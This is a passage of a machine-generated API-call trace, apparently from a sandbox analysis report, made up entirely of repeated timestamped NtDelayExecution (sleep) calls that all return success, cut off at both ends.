(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.937] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.772] NtDelayExecution 